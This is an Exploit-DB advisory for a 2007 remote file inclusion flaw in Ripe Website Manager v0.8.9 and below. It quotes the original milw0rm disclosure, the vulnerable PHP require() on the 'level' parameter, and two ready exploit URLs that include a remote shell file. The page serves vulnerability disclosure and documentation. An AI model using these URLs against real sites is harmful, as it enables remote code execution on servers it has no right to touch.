Ripe Website Manager Remote File Include Vulnerability

vendor:

Ripe Website Manager

by:

BlackNDoor

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Ripe Website Manager

Affected Version From: v0.8.9 and below

Affected Version To: v0.8.9

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Ripe Website Manager Remote File Include Vulnerability

The Ripe Website Manager script (version <= v0.8.9) is vulnerable to remote file inclusion. The vulnerability can be exploited by including arbitrary files via the 'level' parameter in the 'author_panel_header.php' and 'admin_header.php' scripts. An attacker can craft a malicious URL and execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Ripe Website Manager script to a version higher than v0.8.9 or apply any available patches or fixes provided by the vendor.

Source

Exploit-DB raw data:

#Author::   BlackNDoor | blackndoor@learntohell.net
#Homepage:: www.learntohell.net
#
#Script::   Ripe Wepsite Manager
#Version::  <= v0.8.9
#Type::     Remote File Include
#
#Source::   http://sourceforge.net/project/showfiles.php?group_id=194532

#Bug::
   -> Files:

      /admin/includes/author_panel_header.php
      /admin/includes/admin_header.php

   -> vulncode:

      <?php
         ...
         define("LEVEL", $level); // directory level
         
         // includes
           require(LEVEL.'../includes/config.php');
         ...
      ?>

#Exploit::

   http://www.site.com/[path to ripe]/admin/includes/author_panel_header.php?level=shell.txt?
   http://www.site.com/[path to ripe]/admin/includes/admin_header.php?level=shell.txt?

#thanks:: str0ke

# milw0rm.com [2007-06-30]